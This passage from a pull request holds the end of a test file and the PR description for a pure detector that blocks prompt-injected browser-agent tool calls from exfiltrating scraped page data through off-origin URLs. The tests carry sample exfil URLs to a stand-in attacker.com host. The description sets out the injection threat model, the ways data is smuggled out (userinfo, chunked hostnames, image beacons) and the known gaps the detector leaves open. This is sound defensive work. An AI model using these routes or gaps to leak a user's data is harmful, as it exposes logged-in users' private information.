+        currentOrigin: 'https://github.com',
+      });
+      expect(v.action).toBe('allow');
+    }
+  });
+
+  test('normal typed search string (not a URL) is allowed', () => {
+    const v = inspectTabToolCall({
+      name: 'type',
+      args: { text: 'quarterly revenue figures for 2025', selector: 'input[name=q]' },
+      currentOrigin: 'https://www.google.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('a long natural-language typed value (with spaces) is allowed', () => {
+    const v = inspectTabToolCall({
+      name: 'type',
+      args: {
+        text: 'Please summarize the following meeting notes into three concise bullet '
+          + 'points and highlight any action items assigned to the engineering team.',
+        selector: 'textarea',
+      },
+      currentOrigin: 'https://chat.example',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('empty, short, and missing args are allowed', () => {
+    expect(inspectTabToolCall({ name: 'navigate', args: {}, currentOrigin: 'https://x.com' }).action).toBe('allow');
+    expect(inspectTabToolCall({ name: 'navigate', args: { url: '' }, currentOrigin: 'https://x.com' }).action).toBe('allow');
+    expect(inspectTabToolCall({ name: 'navigate', args: { url: 'https://x.com/a/1' }, currentOrigin: 'https://x.com' }).action).toBe('allow');
+    expect(inspectTabToolCall({ name: 'navigate', currentOrigin: 'https://x.com' }).action).toBe('allow');
+    expect(inspectTabToolCall({}).action).toBe('allow');
+  });
+
+  // Never throws — a pure inspector on a hot path. The default param covers
+  // `undefined`; `null` (a common "absent record" shape) must degrade too.
+  test('null / non-object call is allowed, never throws', () => {
+    expect(inspectTabToolCall(null).action).toBe('allow');
+    expect(inspectTabToolCall(undefined).action).toBe('allow');
+    // @ts-expect-error — exercising the hot-path robustness guard with bad input
+    expect(inspectTabToolCall(42).action).toBe('allow');
+    // @ts-expect-error — exercising the hot-path robustness guard with bad input
+    expect(inspectTabToolCall('nope').action).toBe('allow');
+  });
+
+  test('off-origin path blob with NO current origin is allowed (nothing scraped yet)', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `https://attacker.com/${SCRAPED_BLOB}` },
+      currentOrigin: undefined,
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('non-http(s) schemes are ignored (no cross-origin GET exfil)', () => {
+    const v = inspectTabToolCall({
+      name: 'navigate',
+      args: { url: `data:text/html,${SCRAPED_BLOB}` },
+      currentOrigin: 'https://github.com',
+    });
+    expect(v.action).toBe('allow');
+  });
+
+  test('unparseable / relative URL args are allowed (not a working vector)', () => {
+    expect(inspectTabToolCall({
+      name: 'navigate',
+      args: { url: '/relative/path/' + SCRAPED_BLOB },
+      currentOrigin: 'https://github.com',
+    }).action).toBe('allow');
+    expect(inspectTabToolCall({
+      name: 'navigate',
+      args: { url: 'not a url ' + SCRAPED_BLOB },
+      currentOrigin: 'https://github.com',
+    }).action).toBe('allow');
+  });
+});


### PR DESCRIPTION
## What & why

Security-arc **#243** — pure core of the tab-tool egress firewall. The egress-allowlist PreToolUse hook governs the agent's *own* outbound fetches but **exempts every `primitive:'tab'` tool** (those act on the user's logged-in browser — peerd's thesis). That exemption is the gap: a prompt-injected turn can smuggle scraped page data out through a tab tool by navigating/typing to an off-origin URL that carries the data.

This lands the **pure args-half detector** only — `inspectTabToolCall({ name, args, currentOrigin }) → allow | block`. No live-hook wiring yet (a deliberate follow-up). It's defense-in-depth **beneath** the #241 schema boundary and #242 heap fence, not the sole gate — so it errs hard toward allow.

## The detection model

Blocks an off-origin http(s) URL carrying a single **contiguous URL-safe (base64url/hex) high-entropy run ≥ 100 chars** in a **low-false-positive slot**:

| Slot | Why it's clean | Handling |
|---|---|---|
| **userinfo** | no legit blob here | `<blob>@host` → an `Authorization: Basic` leak; username + password scanned |
| **hostname** | normal hosts are short/low-entropy | scanned **dot-collapsed** so a DNS-label-chunked payload (`<h1>.<h2>.<h3>.attacker.com`) re-fuses into one run |
| **path** | normally `/`-segmented | `/` splits it, so only a lone ≥100-char segment trips |

- **Longest single run, not summed volume.** Summing false-blocked OAuth/OIDC PKCE `authorize` URLs (several independent high-entropy values summing past 100); MAX keeps them passing.
- **Never throws** (pure hot-path inspector) — any non-object call incl. `null` degrades to allow. Block reasons are **content-free** (never echo attacker bytes into the audit log).

## The load-bearing design decision: query/fragment are NOT scanned

This is the largest documented residual, and it's deliberate. The query and fragment are where **legitimate** long high-entropy tokens live — OIDC `id_token` JWTs, SAML `SAMLRequest`s, SPA continuation tokens, presigned-URL signatures — and they are **indistinguishable from an exfil blob** by length or entropy. Scanning them would false-block federated login and SPA navigation: a prime-directive violation for a browser agent. #242 is the containment for query/fragment exfil. Other residuals: fragmentation (no single run ≥ 100) and low-entropy/small payloads.

## Review

Reviewed across **three adversarial swarm rounds**. Every confirmed finding was fixed or honestly reclassified as a documented residual:
- userinfo bypass → **fixed** (userinfo now scanned)
- summed-volume false-blocking OAuth PKCE → **fixed** (MAX not SUM)
- standard-base64 `+/` self-fragmentation + the SAML false-block it implies → **reclassified** (query/fragment unscanned; catching it would break SAML)
- DNS/hostname exfil → **fixed** (dot-collapsed hostname slot)
- `inspectTabToolCall(null)` throw → **fixed**
- two residual doc-accuracy minors (readable-slug path block; large-multihash IPFS host) → **docs corrected + pinned as accepted-cost tests**

## Tests & gates

`extension/peerd-runtime/tools/egress-heuristics.js` + `tests/…/egress-heuristics.test.ts` (31 cases pinning both surfaces). Full suite **3116 pass / 0 fail**, `typecheck` / `lint` / `check:tscheck` all clean (tscheck floor 531).

## Deferred (follow-ups)

Live-hook wiring into the tab-tool dispatch, and the page-emitted ``'&lt;img src=attacker.com/?d=…&gt;'`` beacon vector (leaves via the page's own network stack, not a tab-tool arg — needs a declarativeNetRequest layer).

## Note on the visual CI check

If the `visual` job goes red on `sessions-list`, it's the pre-existing message-count race fixed separately in #248, not this change (this PR is pure non-UI logic).

---
_Generated by [Claude Code](https://claude.ai/code/session_01CRfeF2q9Nw7Goiudk6PwQ8)_